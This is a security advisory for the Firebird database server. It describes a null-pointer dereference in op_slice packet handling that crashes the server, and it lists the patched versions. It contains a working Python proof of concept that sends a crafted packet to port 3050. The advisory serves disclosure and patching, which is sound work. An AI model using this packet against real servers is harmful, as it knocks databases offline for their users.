You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
dyemanov
published
GHSA-9884-9qm3-hqchApr 17, 2026
Package
Any firebird version before the fix
Affected versions
Any firebird version before the fix
Patched versions
6.0, 5.0.4, 4.0.7, 3.0.14
Description
Details
When processing an op_slice packet, the network protocol calls the xdr_slice() function with an unprepared slice_response->p_slr_sdl, which contains a null pointer. Inside xdr_slice() it is passed to SDL_info(), and then the null pointer is dereferenced, which causes the server to crash.
PoC
create a small network packet with 3 fields opcode(60), f1(0), f2(>0);
next, it is enough to simply send such packet to the server port using a python script:
from pwn import *
opcode = 60
f1 = 0
f2 = 1
pkt = struct.pack(">III", opcode, f1, f2)
p = remote('localhost', 3050)
p.send(pkt)
p.close()
Impact
Due to an emergency shutdown with a SIGSEGV error, server availability is disrupted.
Details
When processing an op_slice packet, the network protocol calls the xdr_slice() function with an unprepared slice_response->p_slr_sdl, which contains a null pointer. Inside xdr_slice() it is passed to SDL_info(), and then the null pointer is dereferenced, which causes the server to crash.
PoC
Impact
Due to an emergency shutdown with a SIGSEGV error, server availability is disrupted.